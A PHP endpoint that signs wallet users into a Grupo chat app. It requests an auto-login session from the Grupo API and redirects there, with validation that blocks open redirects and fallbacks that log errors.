


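<?php

declare(strict_types=1);

// /chat/sso/index.php
// One-click SSO from wallet -> Grupo (same tab).
//
// Flow: the wallet session must already carry the user's email. We ask the
// Grupo API for a login_session (creating the account on first use) and then
// redirect the browser to the auto-login URL Grupo hands back. Every failure
// path logs the reason and lands the user on the chat app root, never back on
// the wallet login page.

if (session_status() === PHP_SESSION_NONE) {
    session_start();
}

require_once __DIR__ . '/../../config/db_config.php';    // $conn (not used here but fine)
require_once __DIR__ . '/../../config/serv_config.php';  // GRUPO_BASE_URL, GRUPO_API_SECRET

// 1) Must have a logged-in wallet user with email in session
if (empty($_SESSION['email'])) {
    // If not logged in, send to login page as before
    header('Location: /auth/login.php?msg=' . urlencode('Please login to open Chat.'));
    exit;
}

$email     = (string) $_SESSION['email'];
$firstName = (string) ($_SESSION['first_name'] ?? '');
$lastName  = (string) ($_SESSION['last_name']  ?? '');
$fullName  = trim($firstName . ' ' . $lastName);
if ($fullName === '') {
    $fullName = $email; // fallback: email if names not set
}

// 2) Grupo endpoints + fallback URL
$baseUrl     = rtrim((string) GRUPO_BASE_URL, '/');  // e.g. https://apps.bitcardo.net/chat
$apiUrl      = $baseUrl . '/api_request/';           // e.g. https://apps.bitcardo.net/chat/api_request/
$fallbackUrl = $baseUrl . '/';                       // always land inside chat app if SSO fails

// Accept a redirect target taken from the Grupo response only if it is a
// root-relative path or an absolute URL on the same scheme/host/port as
// $baseUrl. The value comes from outside this process, so it is treated as
// untrusted input; without this check a tampered or misconfigured response
// would turn this endpoint into an open redirect. Returns null when rejected.
$safeRedirectTarget = static function ($candidate) use ($baseUrl): ?string {
    if (!is_string($candidate) || $candidate === '') {
        return null;
    }
    // header() refuses CR/LF on its own; rejecting all control characters here
    // means a bad value is logged as a rejected redirect instead of a header error.
    if (preg_match('/[\x00-\x1F\x7F]/', $candidate) === 1) {
        return null;
    }

    $target = parse_url($candidate);
    if ($target === false) {
        return null;
    }

    if (!isset($target['scheme']) && !isset($target['host'])) {
        // Path-only value: allow "/foo" but not "//host/foo" (protocol-relative)
        // or backslash variants that browsers may normalise to "//".
        $isRootRelative = $candidate[0] === '/'
            && substr($candidate, 0, 2) !== '//'
            && strpos($candidate, '\\') === false;

        return $isRootRelative ? $candidate : null;
    }

    $base = parse_url($baseUrl);
    if ($base === false) {
        return null;
    }

    $sameOrigin = strtolower($target['scheme'] ?? '') === strtolower($base['scheme'] ?? '')
        && strtolower($target['host'] ?? '') === strtolower($base['host'] ?? '')
        && ($target['port'] ?? null) === ($base['port'] ?? null);

    return $sameOrigin ? $candidate : null;
};

// 3) Payload for login_session + auto-create
$payload = [
    'add'            => 'login_session',
    // Either "user" (username/email) OR full set when create_account=yes:
    'user'           => $email,               // used if account already exists
    'create_account' => 'yes',                // create if not present
    'email_address'  => $email,
    'username'       => $email,               // you chose email as the username
    'full_name'      => $fullName,
    'password'       => bin2hex(random_bytes(16)), // random; users won’t use it (SSO only)
    'site_role'      => 3,                    // "Registered"
    'api_secret_key' => GRUPO_API_SECRET,
];

// 4) POST to Grupo
$ch = curl_init($apiUrl);
curl_setopt_array($ch, [
    CURLOPT_POST           => true,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_CONNECTTIMEOUT => 10,             // fail fast if Grupo is unreachable
    CURLOPT_TIMEOUT        => 20,             // overall cap, includes connect time
    CURLOPT_SSL_VERIFYPEER => true,           // cURL default, stated explicitly: the API secret travels in this request
    CURLOPT_HTTPHEADER     => ['Content-Type: application/x-www-form-urlencoded'],
    CURLOPT_POSTFIELDS     => http_build_query($payload),
]);
$response = curl_exec($ch);
$curlErr  = curl_error($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// 5) Handle network error: log it, but still send user to chat app (no more redirecting to Bitcardo login)
if ($response === false) {
    error_log("[SSO] cURL error ({$httpCode}): {$curlErr}");
    header('Location: ' . $fallbackUrl);
    exit;
}

// 6) Decode JSON. A valid JSON scalar (e.g. `true` or `"text"`) is not a usable
//    response either, so require an array before indexing into it.
$data = json_decode($response, true);
if (json_last_error() !== JSON_ERROR_NONE || !is_array($data)) {
    error_log("[SSO] Non-JSON or non-object response from Grupo ({$httpCode}): " . substr($response, 0, 1000));
    header('Location: ' . $fallbackUrl);
    exit;
}

// 7) Success → redirect to Grupo's auto_login_url (preferred).
//    Some Grupo setups return a generic 'url' key instead, so try that second.
//    A value that fails the origin check is logged and skipped rather than followed.
foreach (['auto_login_url', 'url'] as $key) {
    if (empty($data[$key])) {
        continue;
    }
    $target = $safeRedirectTarget($data[$key]);
    if ($target !== null) {
        header('Location: ' . $target);
        exit;
    }
    error_log("[SSO] Rejected off-origin or malformed '{$key}' in Grupo response ({$httpCode})");
}

// 8) If Grupo sent a message/error, log it for debugging, then still go to chat app
if (!empty($data['message'])) {
    $message = is_string($data['message']) ? $data['message'] : json_encode($data['message']);
    error_log('[SSO] Grupo message: ' . $message);
}

// Final fallback: open chat app root, not Bitcardo login
header('Location: ' . $fallbackUrl);
exit;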
